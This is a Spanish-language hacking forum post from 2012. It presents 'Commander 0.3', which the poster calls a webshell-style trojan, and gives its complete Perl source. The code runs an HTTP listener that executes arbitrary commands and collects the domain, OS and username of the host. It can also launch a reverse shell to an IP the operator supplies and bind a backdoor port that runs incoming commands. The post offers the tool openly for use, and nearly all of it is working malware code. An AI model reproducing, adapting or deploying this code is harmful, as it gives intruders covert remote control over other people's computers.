[Perl] Commander 0.3

Iniciado por BigBear, 19 Enero 2012, 20:34 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

BigBear

19 Enero 2012, 20:34 PM Ultima modificación: 19 Enero 2012, 20:37 PM por Doddy
Una mejora de un troyano al estilo webshell que habia hecho el verano pasado.

Código (perl) [Seleccionar]

#!usr/bin/perl
#
#C0mmand3r (C) Doddy HAckman 2012
#Version 0.3
#
#A simple WebShell in Perl
#
#

use IO::Socket;
use CGI;
use Cwd;
use Win32;

my $port = rep();

sub rep {
   unless ( $ARGV[0] ) {
       return int("777");    #Your Can Edit 666
   }
   else {
       return int( $ARGV[0] );
   }
}

print "\n\n#########################################\n\n";
print "C0mmand3r (C) Doddy HAckman 2012\n\n\n";
print "[+] Starting the webshell on port $port\n\n";
print "#########################################\n\n";

my $sock = new IO::Socket::INET(
   LocalHost => 'localhost',
   LocalPort => $port,
   Proto     => 'tcp',
   Listen    => SOMAXCONN,
   Reuse     => 1
);

while ( $jebus = $sock->accept() ) {

   print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";

#print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n";
   next if $slave = fork;

   close $sock;

   while ( $response = <$jebus> ) {

       chomp($response);

       my %rta;

       if ( $response =~ /GET/ig ) {
           capturar($response);
       }

       sub capturar {
           my $aa = shift;
           chomp $aa;
           if ( $aa =~ /GET \/(.*) HTTP\/1.1/ig ) {
               my $todo = $1;
               if ( $todo =~ /\?(.*)=(.*)&(.*)=(.*)/ig ) {
                   $rta{$1} = $2;
                   $rta{$3} = $4;
               }
               if ( $todo =~ /\?(.*)=(.*)/ig ) {
                   $rta{$1} = $2;
               }
           }

       }

       print $jebus "

<style type=text/css>


.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: #00FF00;
}

#pie {
position: absolute;
bottom: 0;
}

body,a:link {
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select,fieldset {
background-color:black;color:#00FF00;
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>

";

       if ( $rta{'info'} ) {

           info();

           print $jebus "<center><br><br><b>IP : </b>" . get_ip() . "<br>";
           print $jebus "<center><br><br><b>Domain : </b>"
             . Win32::DomainName() . "<br>";
           print $jebus "<b>Chip : </b>" . Win32::GetChipName() . "<br>";
           print $jebus "<b>OS : </b>" . Win32::GetOSName() . "<br>";
           print $jebus "<b>Version : </b>" . Win32::GetOSVersion() . "<br>";
           print $jebus "<b>User : </b>"
             . Win32::LoginName()
             . "<br><br></center>";
           copyright();

       }

       elsif ( $rta{'console'} ) {
           logouno();
           print $jebus "
<br><br><center>
<form action='' method=GET>
Command : <input type=text name=cmd value=ver><input type=submit value=Execute>
</center></form><br><br>
";
           copyright();
       }

       elsif ( $rta{'cmd'} ) {
           logouno();
           $lucha = $rta{'cmd'};
           print $jebus "<br><br><center><fieldset>";
           $lucha =~ s/\+/ /;
           print $jebus "<br>[+] Command : <b>$lucha</b><br><br>";
           print $jebus qx($lucha);
           print $jebus "</center></fieldset>";
           copyright();
       }

       elsif ( $rta{'reverse'} ) {

           logodos();

           print $jebus qq(
<center>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>Your IP</B> : <input type=text name=ipconnect value=localhost><br>
<b>Port</b> : <input type=text name=port value=666><br>
<br><input type=submit value=Connect></form><br><br>
</center>
);

           copyright();
       }

       elsif ( $rta{'ipconnect'} ) {

           conectar( $rta{'ipconnect'}, $rta{'port'} );
           tipo();

           sub conectar {
               socket( REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp") );
               connect( REVERSE, sockaddr_in( $_[1], inet_aton( $_[0] ) ) );
               open( STDIN,  ">&REVERSE" );
               open( STDOUT, ">&REVERSE" );
               open( STDERR, ">&REVERSE" );
           }

           sub tipo {
               print "\n[*] Reverse Shell Starting...\n\n";
               if ( $^O =~ /Win32/ig ) {
                   infowin();
                   system("cmd.exe");
               }
               else {
                   infolinux();

                   #root();
                   system("export TERM=xterm;exec sh -i");
               }
           }

           sub infowin {
               print "[+] Domain Name : " . Win32::DomainName() . "\n";
               print "[+] OS Version : " . Win32::GetOSName() . "\n";
               print "[+] Username : " . Win32::LoginName() . "\n\n\n";
           }

           sub infolinux {
               print "[+] System information\n\n";
               system("uname -a");
               print "\n\n";
           }
       }

       elsif ( $rta{'backdoor'} ) {

           logotres();

           print $jebus qq(
<center>
<br><br><b>BindPort</b><br><br>
<form action='' method=GET>
<b>Port</b> : <input type=text name=portbind value=666><br>
<br><input type=submit value=Bind></form><br><br>
</center>
);

           copyright();

       }

       elsif ( $rta{'portbind'} ) {

           $backdoor = IO::Socket::INET->new(
               Proto     => 'tcp',
               LocalPort => $rta{'portbind'},
               Listen    => SOMAXC,
               Reuse     => 1
           );

           while ( $jesus = $backdoor->accept() ) {
               $jesus->autoflush(1);
               print $jesus
                 "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : "
                 . $$ . "\n\n";
               print $jesus "Welcome  " . $jesus->peerhost . "\n\n";
               &extras;
               $dir = getcwd();
               print $jesus $dir . ">>";
               while (<$jesus>) {
                   my $yeah = qx($_);
                   print $jesus "\n\n" . $yeah . "\n\n";
                   print $jesus $dir . ">>";
               }
           }

           sub extras {

               if ( $^O =~ //ig ) {
                   print $jesus "[+] Domain Name : "
                     . Win32::DomainName() . "\n";
                   print $jesus "[+] OS Version : "
                     . Win32::GetOSName() . "\n";
                   print $jesus "[+] Username : "
                     . Win32::LoginName()
                     . "\n\n\n";
               }
               else {
                   $s = qx("uname -a");
                   print $jesus "--==System Info==--\n\n" . $s;
               }
           }
       }

       elsif ( $rta{'about'} ) {

           about();

           print $jebus qq(
<pre><center>

                                         
                ¾¾¾¾¾¾¾¾¾¾¾              
            ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾          
          ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾          
        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
       ¾¾¾¾¾¾¾  ¾¾¾¾¾¾¾¾¾¾¾    ¾¾¾¾      
        ¾¾¾¾       ¾¾¾¾¾¾      ¾¾¾¾      
         ¾¾¾      ¾¾¾ ¾¾¾      ¾¾¾        
         ¾¾¾¾¾¾¾¾¾¾¾   ¾¾¾   ¾¾¾¾          
          ¾¾¾¾¾¾¾¾¾     ¾¾¾¾¾¾¾¾¾        
          ¾¾¾¾¾¾¾¾¾  ¾  ¾¾¾¾¾¾¾¾¾        
          ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
               ¾¾¾¾¾¾¾¾¾¾¾¾¾              
             ¾  ¾¾¾¾¾¾¾¾¾¾  ¾            
             ¾    ¾ ¾¾¾¾ ¾  ¾            
             ¾ ¾¾          ¾¾            
    ¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾            
   ¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾    
   ¾¾¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾¾¾¾  
   ¾¾¾¾¾¾¾¾¾¾      ¾¾¾         ¾¾¾¾¾¾¾¾¾  
    ¾¾¾  ¾¾¾¾¾¾             ¾¾¾¾¾¾¾¾¾¾¾  
             ¾¾¾¾¾¾     ¾¾¾¾¾¾¾          
                ¾¾¾¾¾¾¾¾¾¾¾¾              
                 ¾¾¾¾¾¾¾¾¾                
              ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾            
          ¾¾¾¾¾¾¾         ¾¾¾¾¾¾¾        
      ¾¾¾¾¾¾¾                ¾¾¾¾¾¾¾¾¾¾  
 ¾¾¾¾¾¾¾¾                       ¾¾¾¾¾¾¾¾  
 ¾¾¾¾¾¾                           ¾¾¾¾¾¾  
  ¾¾¾¾                             ¾¾¾¾  
                                         

</pre></center>

);

           copyright();

       }
       else {
           print $jebus "
<title>Commander 0.3 (C) Doddy Hackman 2012</title>
<br><br>
<h1><center>Commander</center></h1>
<br><br>
<center>
<table border=1>
<td class=main><center><b>Tools</b></center></td><tr>
<td class=main><a href=?info=true><center>Information</center></a></td><tr>
<td class=main><a href=?console=true><center>Console</center></a></td><tr>
<td class=main><a href=?backdoor=true><center>Backdoor</center></a></td><tr>
<td class=main><a href=?reverse=true><center>ReverseShell</center></a></td><tr>
<td class=main><a href=?about=true><center>About</center></a></td>
</table>
</center>
";
           copyright();
       }
       $jebus->close;
   }
}
continue {
   $jebus->close;
}

sub logouno {
   print $jebus qq(

<pre><center>


   @@@@@@@@                                                  @@            
 @@        @@                                                @@            
 @@                                                          @@            
 @@              @@@@@@    @@  @@@@      @@@@      @@@@@@    @@    @@@@@@  
 @@            @@      @@  @@@@    @@  @@    @@  @@      @@  @@  @@      @@
 @@            @@      @@  @@      @@    @@      @@      @@  @@  @@@@@@@@@@
 @@            @@      @@  @@      @@      @@    @@      @@  @@  @@        
 @@        @@  @@      @@  @@      @@  @@    @@  @@      @@  @@  @@      @@
   @@@@@@@@      @@@@@@    @@      @@    @@@@      @@@@@@    @@    @@@@@@  


</pre></center>
);
}

sub logodos {
   print $jebus qq(
<pre><center>


 @@@@@@@@@@                                                                    
 @@        @@                                                                  
 @@        @@                                                                  
 @@        @@      @@@@@@    @@      @@    @@@@@@    @@@@    @@@@      @@@@@@  
 @@@@@@@@@@      @@      @@  @@      @@  @@      @@  @@    @@    @@  @@      @@
 @@        @@    @@@@@@@@@@    @@  @@    @@@@@@@@@@  @@      @@      @@@@@@@@@@
 @@        @@    @@            @@  @@    @@          @@        @@    @@        
 @@        @@    @@      @@      @@      @@      @@  @@    @@    @@  @@      @@
 @@        @@      @@@@@@        @@        @@@@@@    @@      @@@@      @@@@@@  


</pre></center>
);
}

sub logotres {

   print $jebus qq(
<pre><center>

 @@@@@@@@                              @@                  @@                              
 @@      @@                            @@                  @@                              
 @@      @@                            @@                  @@                              
 @@      @@      @@@@@@      @@@@@@    @@    @@      @@@@@@@@    @@@@@@      @@@@@@    @@@@
 @@@@@@@@              @@  @@      @@  @@  @@      @@      @@  @@      @@  @@      @@  @@  
 @@      @@      @@@@@@@@  @@          @@@@        @@      @@  @@      @@  @@      @@  @@  
 @@      @@    @@      @@  @@          @@  @@      @@      @@  @@      @@  @@      @@  @@  
 @@      @@    @@      @@  @@      @@  @@    @@    @@      @@  @@      @@  @@      @@  @@  
 @@@@@@@@        @@@@@@@@    @@@@@@    @@      @@    @@@@@@@@    @@@@@@      @@@@@@    @@  


</pre></center>
);
}

sub about {

   print $jebus qq(
<pre><center>


     @@        @@                                      
     @@        @@                                  @@  
   @@  @@      @@                                  @@  
   @@  @@      @@@@@@@@      @@@@@@    @@      @@  @@@@
 @@      @@    @@      @@  @@      @@  @@      @@  @@  
 @@      @@    @@      @@  @@      @@  @@      @@  @@  
 @@@@@@@@@@    @@      @@  @@      @@  @@      @@  @@  
@@          @@  @@      @@  @@      @@  @@    @@@@  @@  
@@          @@  @@@@@@@@      @@@@@@      @@@@  @@    @@


</pre></center>
);

}

sub info {

   print $jebus qq(
<pre><center>


 @@    @@        @@    @@@@@@@@@@    @@@@@@@@  
 @@    @@@@      @@    @@          @@        @@
 @@    @@@@      @@    @@          @@        @@
 @@    @@  @@    @@    @@          @@        @@
 @@    @@  @@    @@    @@@@@@@@    @@        @@
 @@    @@    @@  @@    @@          @@        @@
 @@    @@      @@@@    @@          @@        @@
 @@    @@      @@@@    @@          @@        @@
 @@    @@        @@    @@            @@@@@@@@  


</pre></center>
);

}

sub get_ip {
   my $get = gethostbyname("");
   return inet_ntoa($get);
}

sub copyright {
   print $jebus
     "<br><br><br><br><center><h1>Coded By Doddy H</h2></center><br><br>";
   exit(1);
}

# The End ?
Imprimir
Ir Arriba Páginas1
Acciones del Usuario